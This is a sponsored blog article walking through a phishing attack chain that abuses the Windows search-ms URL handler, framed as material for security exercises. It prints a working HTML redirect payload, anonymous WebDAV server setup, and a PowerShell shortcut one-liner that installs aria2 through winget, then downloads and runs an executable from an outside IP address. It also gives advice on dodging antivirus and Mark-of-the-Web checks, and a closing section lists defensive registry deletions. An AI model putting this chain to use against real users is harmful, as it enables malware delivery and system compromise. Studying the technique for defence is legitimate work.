Infection according to Feng Shui or analysis of an attack through Windows vulnerabilities
Disclaimer! After reading the article, the reader will gain a practical understanding of possible actions of attackers and methods of conducting exercises. Information security specialists will be familiar with recommendations for protecting infrastructure within the framework of a contract or employment agreements. Remember that any use of the information provided should be limited to training. The author is not responsible for any negative consequences arising from the unauthorized use of the materials of the article and the information obtained from it.
Step 0. Attack concept
Classically, the first stage is delivered in ordinary ways: mail, instant messengers, abandoned flash drives, etc. Files transmitted through them have long been under suspicion and information security tools (ISM) usually block them using static and dynamic analysis. However, this attack is tied to the specifics of Windows Explorer, or more precisely, the exploitation of the ms-search service, which can be forced to search for malicious files on a third-party server.
Expected behavior from ms-search when searching for .exe files:
Calling a service using a string of arguments:
search-ms:displayname=Search Results in Data (D:)&crumb=fileextension:~<.exe OR System.Generic.String:.exe&crumb=location:D:\
The search-ms service is passed arguments for searching files, which we will consider in detail below:
- displayname will display any text in the string to notify the user of the search location;
- The crumb argument allows you to define filters and search location;
- query can also be used to filter data.
The malicious appeal looks like this:
search-ms:query=.exe&crumb=location:\\95.173.18.16\DavWWWRoot\&displayname=Update
Using the query parameter, files are filtered by the .exe mask, and the crumb parameter via UNC paths determines access to the server where the malware is already stored. Microsoft partially took care of the security of such files and for each material received from the network puts a mark in the alternative data stream MOTW, which is read when opened and displayed as a warning.
However, this mechanism is still complex and suspicious for the end user, a minimally trained employee already knows that he is unlikely to find anything useful for himself in the .exe file. Having improved this mechanism, the following scheme of attack on the user was obtained within the framework of the exercises, this material can also be used within the framework of the “Anti-phishing exercises”.
To deliver a malicious ms-search request, URL schemes are used, disguised as a button on a website or other element. The scheme allows you to contact a third-party server, where the malware of infection – the first stage – has already been prepared. An inconspicuous file of the “pdf” format is launched by the user, under the guise of a downloaded one, and implements the download of the second stage with the main core of the malware. After which the system is infected, let's consider this in practice.
Step 1. Delivery stage
At this stage, delivery files are collected and the infrastructure in which the user will be located at the time of infection is raised. It is also necessary to take into account the features of the operation of the information computing network and the information security system that can detect malicious activity.
Relay server
To implement delivery, it is necessary to raise a server to which the client will contact and search for a malicious file on it. The requirements for this stage are:
- lack of authentication in order to simplify the path of infection;
- restrictions on editing access by other persons;
- close availability of service to the client.
The last point is due to the disadvantage of this delivery method, since the service is raised on the client side for work and only then it contacts the server, sending Propfind, Get requests. All this can take from 10 to 15 seconds, while for the client it will look like a frozen application. As software, we will take the WsgiDav server written in Python and raise it with the command:
wsgidav --host 0.0.0.0 --port 80 --root /tmp/Minfin --auth anonymous
We will specify the server availability from any interface, the standard port 80 and the root folder where the first stage malware will be stored, as well as the anonymous authentication parameter. By default, the root folder is editable, however, this item can be changed in the server configuration. Let's move on to the URL and consider the delivery methods.
Packed URL
To deliver an infected link to a user, letters with disguised elements are usually used. For example, a non-intrusive letter with the ability to index an employee's salary, with a button containing a link at the bottom.
However, please note that the browser has URL schemes, not the mail, so it is not possible to contact via a letter directly; for this, you also need to raise a web server. On which a redirect will already occur according to the scheme.
It is also necessary to select the correct tag for HTML, because most mail clients have learned to detect phishing emails. Submit and JS action buttons will not work, since they are marked as malicious or the JS language itself is not supported by mail. In this case, the usual button This file may have the following approximate appearance:
<html lang="en"><head><meta charset="UTF-8"/><meta http-equiv="refresh" content="2; url=search-ms:query=.lnk&crumb=location:\\93.183.72.112\DavWWWRoot\&displayname=Update"/<title>Redirecting...</title></html>
Next, the user will be prompted to open Explorer and continue working in it.
After which a request will be made to the WebDav server and the filtered contents of the root folder of the request resource will be opened.
Step 2. Infection stage
Classic typosquatting and control symbols have long since ceased to surprise anyone, and EPP and EDR solutions easily recognize popular patterns using Yara rules or dynamic analysis. Accordingly, it is necessary to use a different solution that will not arouse suspicion in the user.
Since we connect to the server via a client – explorer, the display of elements occurs according to the rules of the desktop.ini file. This means that in this case it is possible to use toxic shortcuts with opening PowerShell.
Open the shortcut wizard and select the standard path to PowerShell. We can add options and commands to this path, with which the interpreter should start by default. Since the goal of the first exploit is not to contain the entire malware load, but to disguise itself and load the second one with further launch, it is necessary to disguise the access to the north. To do this, create a regular shortcut with the path to PS.
Let's choose a suitable icon for masking.
Afterwards, it is necessary to stuff it with logic, de facto now there is access to the shell, and accordingly, the ability to control the device relative to the rights of the client on which the application is running. Usually these are users without rights, but this is quite enough to open connections and make changes on the device. When composing the logic, it is worth proceeding from:
- Line character limits;
- Rejection of system folders requiring administrator rights, as well as utilities;
- Small exploit file size;
- Disguised as a legitimate process;
- Hiding windows.
If you select a standard utility or object for work, Network object, Invoke Request, Bit-Transfer, then the connection is immediately blocked based on behavioral analysis and the file is sent to quarantine.
Accordingly, it is necessary to use built-in utilities that will be on most devices to disguise themselves as legitimate processes. For example, winget is a great choice – a package manager that establishes network connections and downloads the necessary software.
Without administrator rights, it will not be possible to specify a new resource and directly download the malicious package, so it is necessary to find a utility that will be installed and run without administrator rights. And also functionally designed for downloading via HTTP protocols. One of these turned out to be aria2, an open source utility that will allow you to download the malware.
Let's put together the logic of the first exploit:
Installing the utility -> Updating environment variables -> Downloading the malware -> Launching the second stage of infection
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe winget install aria2.aria2 -h;.(echo $PSHOME'\powershell.exe')'aria2c http://93.183.72.112/assets/120.exe';.\120.exe
The main feature of the code lines was to call a pure shell script to update environment variables, since it is difficult to access the utility without this. A good reason not to use an absolute path is the character limitation in the shortcut path string.
The logic of operation is implemented simply, without masks in file names or any alternative ways to hide from signature or behavioral analysis, since the utilities used are legitimate in the system.
Let's check the file for antivirus detections and notice that there are only 4 detections! And if we use the domain instead of the IP address and the https protocol instead of http, then perhaps there will be even fewer.
All that remains is to add any binary file or instructions to the server at http://93.183.72.112/assets/ with the name 120.exe, as well as the first stage malware. In this solution, the MOTW label is saved and the user will be warned about the file. In order to avoid it, you can use any file that does not support MOTW and implement the code in it. Or you can use software that does not distribute MotW, such as some programming engines such as Java, Python, Ruby, as well as Microsoft's Visual Studio itself.
But iso and vhd files do not support them at all, since the mark is set in the file system by an alternative stream. And this solution of the iso or vhd file format can contain any other file system that is mounted in the OS.
Step 3. Attack prevention measures for information security staff
This attack is a linear implementation scenario, so to neutralize the vector, it is enough to prohibit opening the ms-search protocol via the browser by deleting the registry keys. In Windows, the HKEY_CLASSES_ROOT keys are used to store associations of file types and protocols with applications.
It is among these that you need to find associations with ms-search and search. Deleting registry keys associated with these protocols means that the operating system and applications can no longer use them to perform the corresponding actions. This effectively blocks access to these protocols, preventing them from being used, for example, by web browsers. Run the commands to prevent the attack:
reg delete HKEY_CLASSES_ROOT\search /f; reg delete HKEY_CLASSES_ROOT\search-ms /f
Particular attention in this chain should be paid to URL schemes, since there are a large number of associations between protocols and applications.
Another attack vector is quite possible via a malicious link in the browser in relation to system software, including office applications. By default, even Excel is available, so it is theoretically possible to launch an Excel file simply by clicking on the link.
ms-excel:ofv|u|http://10.0.0.3/Book1.xlsx
Or a vector similar to the one described earlier, but using the SFTP protocol for transfer.
The issue of URL scheme security remains open, as this is an obvious attack vector with a fairly short path for an intruder to enter the system. To neutralize this, you can use both radical measures – deleting protocol associations, and implementing rules for SIEM, EPP, EDR, SOAR detection and response to requests to the registry of important keys.
Unfortunately, vendors are not always in a hurry to fix system vulnerabilities, so it is quite important to conduct your own research and analysis of infrastructure security, and also not to forget about Vulnerability Management.
The article is supported by the team Serverspace.
Serverspace — a cloud services provider that rents out virtual servers with Linux and Windows OS in 8 data centers: Russia, Belarus, Kazakhstan, the Netherlands, Turkey, the USA, Canada and Brazil. To build an IT infrastructure, the provider also offers: creating networks, gateways, backups, CDN services, DNS, S3 object storage.
IT infrastructure | Cashback 17% with code HABR